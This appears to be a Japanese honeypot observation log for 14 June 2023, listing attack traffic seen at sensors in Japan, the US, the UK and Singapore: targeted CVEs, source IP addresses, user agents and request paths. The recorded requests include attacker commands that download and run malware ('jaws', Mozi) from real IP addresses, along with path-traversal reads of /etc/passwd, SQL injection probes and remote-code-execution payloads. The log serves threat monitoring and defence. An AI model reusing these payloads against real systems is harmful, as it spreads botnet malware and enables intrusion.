ハニーポット(仮) 観測記録 2023/06/14分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Location:JP
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 95.214.27.201/jaws; sh /tmp/jaws
Location:US
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
FortiOSの脆弱性(CVE-2018-13379)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 103.16.161.29/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 95.214.27.201/jaws; sh /tmp/jaws
Location:UK
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 167.71.210.63/jaws; sh /tmp/jaws
Location:SG
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 103.16.161.29/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget http://190.109.228.141:47854/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:113 (前日比:3)
US:総アクセス数:200 (前日比:101)
UK:総アクセス数:95 (前日比:7)
SG:総アクセス数:120 (前日比:-118)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
11 | 3.215.133.80 | United States |
1 | 3.236.148.162 | United States |
2 | 24.199.98.33 | United States |
2 | 34.204.192.185 | United States |
1 | 35.92.191.132 | United States |
17 | 43.154.141.71 | Singapore |
1 | 45.56.108.128 | United States |
1 | 45.79.181.251 | United States |
1 | 45.156.128.2 | Hungary |
1 | 45.183.160.84 | Brazil |
1 | 49.213.185.91 | Taiwan |
1 | 64.62.197.100 | United States |
1 | 64.62.197.105 | United States |
3 | 79.133.51.240 | Germany |
1 | 87.120.88.17 | Bulgaria |
1 | 104.192.0.50 | United States |
1 | 104.248.170.187 | United States |
1 | 107.170.224.10 | United States |
1 | 107.170.235.18 | United States |
2 | 109.237.97.180 | Russia |
1 | 128.1.248.26 | United States |
1 | 128.127.105.134 | Netherlands |
16 | 135.125.246.189 | France |
2 | 138.197.15.3 | United States |
2 | 146.190.48.172 | United States |
4 | 152.32.171.91 | Hong Kong |
1 | 162.142.125.12 | United States |
10 | 167.71.37.220 | United States |
1 | 167.94.138.52 | United States |
1 | 167.248.133.37 | United States |
1 | 172.104.11.51 | United States |
1 | 172.104.242.173 | United States |
1 | 173.212.243.253 | Germany |
1 | 175.107.0.151 | Pakistan |
1 | 185.157.78.242 | Ukraine |
3 | 185.254.196.173 | Ukraine |
1 | 185.254.196.186 | Ukraine |
1 | 188.165.63.130 | France |
1 | 193.29.104.212 | Romania |
1 | 193.35.18.52 | Bulgaria |
1 | 193.35.18.200 | Bulgaria |
1 | 198.235.24.2 | United States |
1 | 203.115.85.224 | India |
1 | 205.210.31.228 | United States |
1 | 206.189.116.185 | United States |
1 | 212.224.107.220 | Germany |
5 | 220.94.228.163 | South Korea |
UserAgent一覧
件数 | UserAgent |
---|---|
27 | - |
2 | Go-http-client/1.1 |
2 | Hello, world |
1 | Mozilla/5.0 (Linux; Android 11; LM-V500N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; Android 12; SM-F926B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3 |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 |
17 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
21 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (compatible; YandexNews/4.0; +http[:]//yandex[.]com/bots) |
7 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.0 |
1 | Python-urllib/3.6 |
1 | SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 |
1 | python-requests/2.31.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | - |
||
1 | MGLNDD_18.179.20.5_80\n |
||
1 | \x16\x03\x01\x01H\x01 |
||
1 | \x16\x03\x01\x01\t\x01 |
||
2 | \x16\x03\x01\x01\xfa\x01 |
||
13 | \x16\x03\x01 |
||
2 | `` | ||
23 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
2 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.svn/wc.db |
HTTP/1.1 |
1 | GET | /1.php |
HTTP/1.1 |
1 | GET | /99vt |
HTTP/1.1 |
1 | GET | /99vu |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
3 | GET | /aaa9 |
HTTP/1.1 |
1 | GET | /aaaaaaaaaaaaaaaaaaaaaaaaaqr |
HTTP/1.1 |
3 | GET | /aab8 |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /bundle.js |
HTTP/1.1 |
1 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /data/.svn/wc.db |
HTTP/1.1 |
1 | GET | /druid/index.html |
HTTP/1.1 |
7 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /files/ |
HTTP/1.1 |
1 | GET | /gate.php |
HTTP/1.1 |
1 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
3 | GET | /robots.txt |
HTTP/1.1 |
2 | GET | /sendgrid.env |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+95[.]214[.]27[.]201/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /smtp.php |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
1 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /v3/time |
HTTP/1.1 |
1 | GET | /web/.svn/wc.db |
HTTP/1.1 |
17 | HEAD | /Core/Skin/Login.aspx |
HTTP/1.1 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh |
HTTP/1.1 |
1 | fox | a 1 -1 fox hello\n |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 31.7.63.42 | Panama |
2 | 34.204.192.185 | United States |
1 | 45.33.80.243 | United States |
1 | 45.79.128.205 | United States |
1 | 45.79.172.21 | United States |
1 | 45.79.181.104 | United States |
2 | 45.79.181.251 | United States |
1 | 45.156.129.12 | Hungary |
1 | 51.158.37.186 | France |
28 | 54.36.115.221 | France |
7 | 54.37.79.75 | France |
1 | 64.227.43.118 | United States |
2 | 68.183.193.242 | United States |
4 | 71.6.135.131 | United States |
1 | 77.245.219.203 | Russia |
2 | 80.94.95.248 | Romania |
12 | 83.97.73.89 | Germany |
1 | 84.54.51.109 | Bulgaria |
1 | 87.120.88.17 | Bulgaria |
1 | 94.23.133.43 | France |
1 | 103.170.254.16 | Vietnam |
1 | 103.179.189.234 | Vietnam |
2 | 109.237.97.180 | Russia |
2 | 109.237.98.226 | Russia |
1 | 128.1.248.26 | United States |
1 | 129.114.108.70 | United States |
10 | 147.182.145.248 | United States |
2 | 152.89.198.113 | Russia |
2 | 162.142.125.225 | United States |
2 | 162.142.125.226 | United States |
1 | 167.99.82.178 | United States |
1 | 172.104.11.34 | United States |
1 | 172.105.128.11 | United States |
4 | 172.105.128.13 | United States |
2 | 179.43.177.244 | Panama |
1 | 185.11.61.117 | Russia |
4 | 185.142.236.36 | Seychelles |
1 | 187.232.93.12 | Mexico |
1 | 192.155.90.220 | United States |
1 | 192.241.229.18 | United States |
1 | 192.241.236.40 | United States |
2 | 193.32.162.190 | Romania |
2 | 193.35.18.63 | Bulgaria |
1 | 198.199.114.126 | United States |
1 | 201.77.117.62 | Brazil |
1 | 205.185.116.25 | United States |
1 | 205.210.31.46 | United States |
1 | 205.210.31.155 | United States |
2 | 216.218.206.66 | United States |
1 | 220.94.228.163 | South Korea |
75 | 222.240.51.96 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
38 | - |
1 | ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41) |
3 | Hello, world |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
1 | Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5056.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
75 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
37 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0 |
7 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
6 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.0 |
1 | python-requests/2.27.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_34.68.118.83_80\n |
||
3 | \x03 |
||
2 | \x16\x03\x01\x01H\x01 |
||
2 | \x16\x03\x01\x01\xfb\x01 |
||
18 | \x16\x03\x01 |
||
1 | \x16\x03\x03\x01\x8e\x01 |
||
2 | \x16\x03\x03 |
||
1 | `` | ||
1 | GET | /%2e/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /../../mnt/mtd/Config/Account1 |
HTTP/1.1 |
1 | GET | /../../mnt/mtd/Config/Account2 |
HTTP/1.1 |
37 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
2 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /1.php |
HTTP/1.1 |
1 | GET | /15294746.php |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /aaa9 |
HTTP/1.1 |
1 | GET | /aab8 |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,41639*41036,5,6,7%20limit%205,1%20%23 |
HTTP/1.1 |
1 | GET | /api/proxy/tcp |
HTTP/1.1 |
1 | GET | /api/v1/users/connection-token/ |
HTTP/1.1 |
1 | GET | /api/whoami |
HTTP/1.1 |
1 | GET | /appmonitor/protected/selector/server_file/files?folder=/&suffix= |
HTTP/1.1 |
1 | GET | /bundle.js |
HTTP/1.1 |
1 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /common/download/resource?resource=/profile/../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /data/.svn/wc.db |
HTTP/1.1 |
1 | GET | /data/pbootcms.db |
HTTP/1.1 |
1 | GET | /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp |
HTTP/1.1 |
1 | GET | /download.php?file=../../../../../etc/passwd |
HTTP/1.1 |
2 | GET | /druid/index.html |
HTTP/1.1 |
1 | GET | /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005))) |
HTTP/1.1 |
1 | GET | /f/job.php?job=getzone&typeid=zone&fup=..\\..\\do\\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5(202799194),9,10,11,12,13,14,15,16,17,18,19%23 |
HTTP/1.1 |
9 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /files/ |
HTTP/1.1 |
1 | GET | /forum.php |
HTTP/1.1 |
1 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /geoserver |
HTTP/1.1 |
1 | GET | /getFavicon?host=baidu.com/? |
HTTP/1.1 |
1 | GET | /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /him/api/rest/V1.0/system/log/list?filePath=../ |
HTTP/1.1 |
1 | GET | /hosts |
HTTP/1.1 |
1 | GET | /htmltopdf/downfile.php?filename=/windows/win.ini |
HTTP/1.1 |
1 | GET | /iclock/ccccc/windows/win.ini |
HTTP/1.1 |
1 | GET | /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /info |
HTTP/1.1 |
1 | GET | /jmx-console/ |
HTTP/1.1 |
1 | GET | /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd |
HTTP/1.1 |
1 | GET | /kylin/api/admin/config |
HTTP/1.1 |
1 | GET | /member/ajax_membergroup.php?action=post&membergroup=@ '/*!50000Union+*/+/*!50000select+*/+md5(902215800)+--+@ '`` |
HTTP/1.1 |
1 | GET | /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2030372223))%23 |
HTTP/1.1 |
1 | GET | /nifi-api/flow/current-user |
HTTP/1.1 |
1 | GET | /plug/oem/AspCms_OEMFun.asp |
HTTP/1.1 |
1 | GET | /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t |
HTTP/1.1 |
1 | GET | /plus/guestbook.php |
HTTP/1.1 |
1 | GET | /pma/ |
HTTP/1.1 |
1 | GET | /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /s/lvtlcp/_/;/WEB-INF/web.xml |
HTTP/1.1 |
1 | GET | /s/opentsdb_header.jpg |
HTTP/1.1 |
1 | GET | /secure/QueryComponent!Default.jspa |
HTTP/1.1 |
1 | GET | /secure/ViewUserHover.jspa?username=adbehtkp |
HTTP/1.1 |
1 | GET | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http[:]//aaa%27)%0a@Grab(group=%27package%27,%20module=%27jmiz%27,%20version=%271%27)%0aimport%20Payload; |
HTTP/1.1 |
1 | GET | /serverLog/showFile.php?fileName=../web/html/main.php |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+103[.]16[.]161[.]29/jaws;sh+/tmp/jaws |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+95[.]214[.]27[.]201/jaws;sh+/tmp/jaws |
HTTP/1.1 |
2 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /spaces/viewdefaultdecorator.action?decoratorName |
HTTP/1.1 |
1 | GET | /system/deviceInfo?auth=YWRtaW46MTEK |
HTTP/1.1 |
1 | GET | /systemController/showOrDownByurl.do?down=&dbPath=../../../../../Windows/win.ini |
HTTP/1.1 |
1 | GET | /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF |
HTTP/1.1 |
1 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /user.php?act=login |
HTTP/1.1 |
1 | GET | /user/City_ajax.aspx |
HTTP/1.1 |
1 | GET | /utils/.git/config |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /viewthread.php?tid=10 |
HTTP/1.1 |
1 | GET | /vpn/../vpns/cfg/smb.conf |
HTTP/1.1 |
1 | GET | /web/.svn/wc.db |
HTTP/1.1 |
1 | POST | /(download)/tmp/dptwotzc.txt |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /WEB_VMS/LEVEL15/ |
HTTP/1.1 |
1 | POST | /api/graphql |
HTTP/1.1 |
7 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /delete_cart_goods.php |
HTTP/1.1 |
1 | POST | /directdata/direct/router |
HTTP/1.1 |
2 | POST | /druid/indexer/v1/sampler?for=connect |
HTTP/1.1 |
1 | POST | /extdirect |
HTTP/1.1 |
1 | POST | /extend/Qcloud/Sms/Sms.php |
HTTP/1.1 |
1 | POST | /fileDownload?action=downloadBackupFile |
HTTP/1.1 |
1 | POST | /inter/ajax.php?cmd=get_user_login_cmd |
HTTP/1.1 |
2 | POST | /login/userverify.cgi |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
1 | POST | /minio/webrpc |
HTTP/1.1 |
1 | POST | /node/?_format=hal_json |
HTTP/1.1 |
1 | POST | /pages/createpage-entervariables.action?SpaceKey=x |
HTTP/1.1 |
1 | POST | /photo/p/api/album.php |
HTTP/1.1 |
1 | POST | /rest/tinymce/1/macro/preview |
HTTP/1.1 |
1 | POST | /services%20/WorkflowServiceXml |
HTTP/1.1 |
1 | POST | /user.php |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
1 | PUT | /SDK/webLanguage |
HTTP/1.1 |
1 | PUT | /_snapshot/bywd |
HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 34.204.192.185 | United States |
1 | 42.233.149.126 | China |
1 | 45.33.80.243 | United States |
3 | 45.74.10.2 | United States |
1 | 45.79.172.21 | United States |
1 | 45.79.181.94 | United States |
1 | 45.79.181.179 | United States |
1 | 45.79.181.251 | United States |
1 | 45.156.129.7 | Hungary |
1 | 46.101.8.248 | United States |
14 | 51.79.29.48 | Canada |
14 | 54.37.79.75 | France |
1 | 61.218.134.220 | Taiwan |
1 | 62.8.65.212 | Kenya |
1 | 64.62.197.137 | United States |
1 | 64.62.197.143 | United States |
1 | 66.175.213.4 | United States |
1 | 66.240.192.82 | United States |
4 | 68.183.203.70 | United States |
1 | 79.79.57.171 | United Kingdom |
1 | 80.66.88.211 | Russia |
8 | 83.97.73.89 | Germany |
1 | 85.208.139.156 | Bulgaria |
1 | 94.23.133.43 | France |
1 | 107.170.254.15 | United States |
2 | 109.237.97.180 | Russia |
2 | 109.237.98.226 | Russia |
1 | 128.14.134.170 | United States |
1 | 138.68.80.252 | United States |
1 | 138.68.81.206 | United States |
1 | 139.59.209.155 | Singapore |
2 | 157.230.99.133 | United States |
1 | 161.35.41.172 | United States |
2 | 167.94.146.57 | United States |
1 | 170.245.31.67 | Brazil |
1 | 172.104.11.34 | United States |
1 | 172.104.11.46 | United States |
1 | 172.104.11.51 | United States |
1 | 179.43.177.244 | Panama |
1 | 185.11.61.117 | Russia |
3 | 192.155.90.220 | United States |
1 | 192.241.225.17 | United States |
1 | 192.241.236.64 | United States |
2 | 193.32.162.190 | Romania |
1 | 193.35.18.52 | Bulgaria |
1 | 193.35.18.200 | Bulgaria |
1 | 205.210.31.5 | United States |
1 | 205.210.31.89 | United States |
1 | 220.94.228.162 | South Korea |
UserAgent一覧
件数 | UserAgent |
---|---|
32 | - |
5 | FooBarTest |
1 | Hello, world |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 |
30 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
4 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - |
||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
1 | MGLNDD_132.145.66.34_80\n |
||
2 | \x03 |
||
2 | \x16\x03\x01\x01H\x01 |
||
2 | \x16\x03\x01\x01\xfc\x01 |
||
17 | \x16\x03\x01 |
||
1 | \x16\x03\x03\x01\x8e\x01 |
||
1 | `` | ||
1 | CONNECT | ssl-judge2[.]api[.]proxyscrape[.]com:443 |
HTTP/1.1 |
1 | GET | /../../mnt/mtd/Config/Account1 |
HTTP/1.1 |
1 | GET | /../../mnt/mtd/Config/Account2 |
HTTP/1.1 |
31 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /1.php |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /bundle.js |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /data/.svn/wc.db |
HTTP/1.1 |
1 | GET | /druid/index.html |
HTTP/1.1 |
4 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /files/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+167[.]71[.]210[.]63/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /web/.svn/wc.db |
HTTP/1.1 |
5 | GET | http[:]//test[.]getproxylist[.]com/ |
HTTP/1.1 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh |
HTTP/1.1 |
